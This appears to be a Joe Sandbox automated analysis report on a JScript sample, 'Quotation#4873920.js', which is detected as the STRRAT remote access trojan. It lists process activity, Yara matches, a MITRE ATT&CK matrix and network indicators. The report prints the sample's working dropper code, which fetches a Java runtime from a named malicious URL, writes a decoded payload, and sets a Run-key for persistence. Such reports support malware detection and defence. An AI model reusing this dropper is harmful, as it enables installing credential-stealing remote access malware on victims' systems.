        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

        Data Obfuscation

        barindex
        JScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);var stubpath = appdatadir + "\\" + r + ".txt"var decoded = decodeBase64(longText);writeBytes(stubpath, decoded);var fso = WScript.CreateObject("Scripting.FileSystemObject");var text = "";try{text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");}catch(err){}try{if(text == ""){text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");if(text != ""){text = text + "\\bin\\javaw.exe";}}else{text = text + "\\bin\\javaw.exe";}}catch(err){}try{if(text != ""){//wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + text + "\" -jar \"" + stubpath + "\"");} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var xHttp = WScript.CreateObject("msxml2.serverxmlhttp.6.0");var bStrm = WScript.CreateObject("Adodb.Stream");xHttp.open("GET", "http://wshsoft.company/jv/jrex.zip", false);xHttp.setOption(2, 13056);xHttp.send();bStrm.Type = 1;bStrm.open();bStrm.write(xHttp.responseBody);bStrm.savetofile(appdatadir + "\\jre.zip", 2);break;}catch(err){WScript.Sleep(5000);}}while(true);UnZip(appdatadir + "\\jre.zip", appdatadir + "\\jre7");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion", "1.8", "REG_SZ");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\1.8\\JavaHome", appdatadir + "\\jre7", "REG_SZ");wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"");}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}function writeBytes(file, bytes){var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}function UnZip(zipfile, ExtractTo){if(fso.GetExtensionName(zipfile) == "zip"){if(!fso.FolderExists(ExtractTo)){fso.CreateFolder(ExtractTo);}var objShell = WScript.CreateObject("Shell.Application");var destination = objShell.NameSpace(ExtractTo);var zip_content = objShell.NameSpace(zipfile).Items(); for(i = 0; i < zip_content.Count; i++){if(fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName
        Yara detected AllatoriJARObfuscator
        Source: Yara matchFile source: 00000002.00000002.3369356460.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: javaw.exe PID: 6556, type: MEMORYSTR
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_3_15157BD9 push ebp; retf 2_3_15157C47
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_3_15157BD9 push ebp; retf 2_3_15157C47
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_0243FACF push es; iretd 2_2_0243FAD0
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_02439091 push cs; retf 2_2_024390B1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_0239D8F7 push 00000000h; mov dword ptr [esp], esp2_2_0239D921
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_0239A21B push ecx; ret 2_2_0239A225
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_0239A20A push ecx; ret 2_2_0239A21A
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_0239BB67 push 00000000h; mov dword ptr [esp], esp2_2_0239BB8D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_0239B3B7 push 00000000h; mov dword ptr [esp], esp2_2_0239B3DD
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_0239D8E0 push 00000000h; mov dword ptr [esp], esp2_2_0239D921
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_0239B947 push 00000000h; mov dword ptr [esp], esp2_2_0239B96D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_0239C477 push 00000000h; mov dword ptr [esp], esp2_2_0239C49D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: javaw.exe, 00000002.00000003.2095960729.0000000014A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: javaw.exe, 00000002.00000003.2095960729.0000000014A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: javaw.exe, 00000002.00000002.3367136208.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Ljava/lang/VirtualMachineError;
        Source: javaw.exe, 00000002.00000003.2095960729.0000000014A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
        Source: javaw.exe, 00000002.00000002.3367136208.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cjava/lang/VirtualMachineError
        Source: javaw.exe, 00000002.00000003.2095960729.0000000014A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
        Source: javaw.exe, 00000002.00000002.3367136208.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMDp
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_023A63B4 LdrInitializeThunk,2_2_023A63B4
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeMemory protected: page read and write | page guardJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\rybdyjbhxf.txt"Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 2_2_023903C0 cpuid 2_2_023903C0
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersionJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersionJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\6556 VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Users\user\3608lock.file VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected STRRAT
        Source: Yara matchFile source: 00000002.00000002.3369356460.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: javaw.exe PID: 6556, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected STRRAT
        Source: Yara matchFile source: 00000002.00000002.3369356460.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: javaw.exe PID: 6556, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information12
        Scripting        		Valid AccountsWindows Management Instrumentation12
        Scripting        		11
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        Security Software Discovery        		Remote ServicesData from Local System2
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Services File Permissions Weakness        		1
        Services File Permissions Weakness        		1
        Disable or Modify Tools        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        DLL Side-Loading        		1
        DLL Side-Loading        		11
        Process Injection        		Security Account Manager32
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information        		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Services File Permissions Weakness        		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Quotation#4873920.js24%ReversingLabsScript-JS.Trojan.Cryxos
        Quotation#4873920.js38%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        github.com0%VirustotalBrowse
        dualstack.sonatype.map.fastly.net0%VirustotalBrowse
        repo1.maven.org0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
        http://www.quovadisglobal.com/cps00%URL Reputationsafe
        https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar1%VirustotalBrowse
        https://github.com0%VirustotalBrowse
        http://cps.chambersign.org/cps/chambersroot.html00%VirustotalBrowse
        http://crl.xrampsecurity.com/XGCA.crl0%VirustotalBrowse
        http://java.oracle.com/0%VirustotalBrowse
        http://bugreport.sun.com/bugreport/0%VirustotalBrowse
        http://null.oracle.com/0%VirustotalBrowse
        http://crl.chambersign.org/chambersroot.crl00%VirustotalBrowse
        http://repository.swisssign.com/00%VirustotalBrowse
        https://ocsp.quovadisoffshore.com0%VirustotalBrowse
        https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar2%VirustotalBrowse
        http://www.quovadisglobal.com/cps0%VirustotalBrowse
        http://policy.camerfirma.com0%VirustotalBrowse
        https://repo1.maven.org0%VirustotalBrowse
        http://cps.chambersign.org/cps/chambersroot.html0%VirustotalBrowse
        https://repository.luxtrust.lu0%VirustotalBrowse
        https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar1%VirustotalBrowse
        http://www.quovadis.bm0%VirustotalBrowse
        http://crl.securetrust.com/STCA.crl0%VirustotalBrowse
        http://crl.xrampsecurity.com/XGCA.crl00%VirustotalBrowse
        http://wshsoft.company/jv/jrex.zip14%VirustotalBrowse
        http://repository.swisssign.com/0%VirustotalBrowse
        http://crl.chambersign.org/chambersroot.crl0%VirustotalBrowse
        http://www.allatori.com1%VirustotalBrowse
        http://www.chambersign.org0%VirustotalBrowse
        https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar2%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        github.com
        		140.82.121.3
        		truefalseunknown
        dualstack.sonatype.map.fastly.net
        		199.232.192.209
        		truefalseunknown
        repo1.maven.org
        		unknown
        		unknownfalseunknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://crl.xrampsecurity.com/XGCA.crljavaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jarjavaw.exe, 00000002.00000002.3367891191.0000000004849000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3374241246.00000000154B8000.00000004.00000001.00020000.00000000.sdmpfalseunknown
        http://crl.chambersign.org/chambersroot.crl0javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://github.comjavaw.exe, 00000002.00000002.3367891191.00000000048B8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004800000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004744000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.000000000497A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004600000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.00000000046A5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://repository.luxtrust.lu0javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalse
          		unknown
          http://bugreport.sun.com/bugreport/javaw.exe, 00000002.00000002.3369356460.0000000009B69000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          http://cps.chambersign.org/cps/chambersroot.html0javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          http://java.oracle.com/javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          http://null.oracle.com/javaw.exe, 00000002.00000002.3373832091.0000000015062000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.2149100167.000000001506B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009D16000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.3158902569.0000000015062000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          http://www.chambersign.org1javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalse
            		unknown
            http://repository.swisssign.com/0javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jarjavaw.exe, 00000002.00000002.3367891191.0000000004849000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://policy.camerfirma.comjavaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            https://ocsp.quovadisoffshore.comjavaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarjavaw.exe, 00000002.00000002.3367891191.0000000004849000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://crl.securetrust.com/STCA.crl0javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.quovadisglobal.com/cpsjavaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://cps.chambersign.org/cps/chambersroot.htmljavaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://crl.securetrust.com/STCA.crljavaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            https://repo1.maven.orgjavaw.exe, 00000002.00000002.3367891191.000000000490B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004930000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.000000000478E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004629000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.00000000046D4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004600000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004615000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.000000000476E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3367891191.0000000004849000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            https://repository.luxtrust.lujavaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://www.quovadisglobal.com/cps0javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.xrampsecurity.com/XGCA.crl0javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://www.quovadis.bmjavaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://www.quovadis.bm0javaw.exe, 00000002.00000002.3369356460.0000000009D7D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              http://wshsoft.company/jv/jrex.zipwscript.exe, 00000000.00000003.2096642699.0000022D3E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095178342.0000022D3DF1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2091937928.0000022D3DCCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2112718585.0000022D3DF53000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095178342.0000022D3DEF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095452260.0000022D3DF73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095984399.0000022D3DF49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2112693783.0000022D3DF12000.00000004.00000020.00020000.00000000.sdmptrueunknown
              https://ocsp.quovadisoffshore.com0javaw.exe, 00000002.00000002.3369356460.0000000009D7D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                http://www.allatori.comjavaw.exe, 00000002.00000002.3369356460.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://crl.chambersign.org/chambersroot.crljavaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://repository.swisssign.com/javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://www.chambersign.orgjavaw.exe, 00000002.00000002.3369356460.0000000009F91000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jarjavaw.exe, 00000002.00000002.3367891191.00000000046A5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://policy.camerfirma.com0javaw.exe, 00000002.00000002.3369356460.0000000009DB3000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  199.232.192.209
                  		dualstack.sonatype.map.fastly.netUnited States
                  		54113FASTLYUSfalse
                  140.82.121.3
                  		github.comUnited States
                  		36459GITHUBUSfalse
                  140.82.121.4
                  		unknownUnited States
                  		36459GITHUBUSfalse
                  199.232.196.209
                  		unknownUnited States
                  		54113FASTLYUSfalse

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1524793
                  Start date and time:2024-10-03 09:23:42 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 49s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Without Instrumentation
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Quotation#4873920.js
                  Detection:MAL
                  Classification:mal100.troj.evad.winJS@6/4@8/4
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 63%
                  • Number of executed functions: 14
                  • Number of non-executed functions: 3
                  Cookbook Comments:
                  • Found application associated with file extension: .js

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target javaw.exe, PID 6556 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  199.232.192.209Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                    PO#518464.jsGet hashmaliciousSTRRATBrowse
                      PO#518464.jsGet hashmaliciousSTRRATBrowse
                        Proof Of Payment.jsGet hashmaliciousSTRRATBrowse
                          Product Specification Wire-Mesh RQF 260924.sc.exeGet hashmaliciousSTRRATBrowse
                            PO#518463.jsGet hashmaliciousSTRRATBrowse
                              PO#518463.jsGet hashmaliciousSTRRATBrowse
                                Tax Returns of R38,765.jsGet hashmaliciousSTRRATBrowse
                                  Tax Returns of R38,765.jsGet hashmaliciousSTRRATBrowse
                                    140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                                    • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                                    firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                                    • github.com/john-xor/temp/blob/main/index.html?raw=true
                                    0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                                    • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                    MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                                    • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                    RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                    • github.com/ssbb36/stv/raw/main/5.mp3
                                    140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                    • github.com/ssbb36/stv/raw/main/5.mp3

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    dualstack.sonatype.map.fastly.netRequest For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.196.209
                                    Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.196.209
                                    PO#518464.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    PO#518464.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
